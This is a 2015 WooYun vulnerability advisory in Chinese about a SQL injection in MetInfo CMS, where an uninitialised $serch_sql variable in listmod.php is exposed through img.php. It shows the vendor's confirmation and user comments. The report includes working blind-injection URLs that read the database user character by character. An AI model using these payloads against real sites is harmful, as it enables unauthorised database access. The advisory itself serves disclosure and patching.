Metinfo最新版一处注入及一个小问题

漏洞概要

缺陷编号:WooYun-2015-0125648

漏洞标题:Metinfo最新版一处注入及一个小问题

相关厂商:MetInfo

漏洞作者:玉林嘎

提交时间:2015-07-09 15:24

公开时间:2015-10-10 13:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商已经确认,细节仅向厂商公开
2015-07-15: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

rt

详细说明:

metinfo最新版1、注入漏洞文件:/include/global/listmod.php截取关键代码

$serch_sql之前在这段代码前 包括后面调用这个文件的文件都没声明 所以第一次声明是在下列代码 但是if语句中的 $serch_sql是 $serch_sql .= 这类形式的

导致可以直接控制$serch_sql参数啦在之后

进入查询但是前面有一些条件 所以我们需要调用这个文件才行$imgproduct需满足所以调用/img/img.php这个文件证明:我们在 赋值之后打印出来 看仔细点

可以控制**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=114,1,2%29%23

**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=115,1,2%29%23

漏洞证明:

另一个小问题/wap/module.php

$list_num参数 如果进入case 1 就可以控制

本以为 是个limit注入

在这个表中 根本没这些 字段...

修复方案:

过滤

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-1213:08

厂商回复:

是系统漏洞,后续版本修复。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 answer 白帽子 | Rank:370 漏洞数:31)

    牛逼

  2. 2010-01-01 00:00 無名老人 白帽子 | Rank:10 漏洞数:1)

    看来你已经拿到源码开始审计了啊, 今天拿到份5.2 的源码。 正准备搞呢。。

  3. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    通用的速度 感动啊!

  4. 2010-01-01 00:00 牛肉包子 白帽子 | Rank:190 漏洞数:17)

    2K?

  5. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    @牛肉包子 嗯

  6. 2010-01-01 00:00 Cheery 白帽子 | Rank:10 漏洞数:1)

    大牛 带我飞

  7. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    玉总带我飞好么

  8. 2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)

    @玉林嘎 带我飞⊙﹏⊙

  9. 2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)

    求带飞

  10. 2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)

    http://wooyun.org/bugs/wooyun-2010-0119166 跟这个一模一样的

  11. 2010-01-01 00:00 玉林嘎 白帽子 | Rank:757 漏洞数:64)

    @menmen519 我看到你那个公开之后 发现差不多的问题 就是入口不一样而已

  12. 2010-01-01 00:00 menmen519 白帽子 | Rank:624 漏洞数:73)

    @玉林嘎 哦 呵呵 反正2k到手 哈哈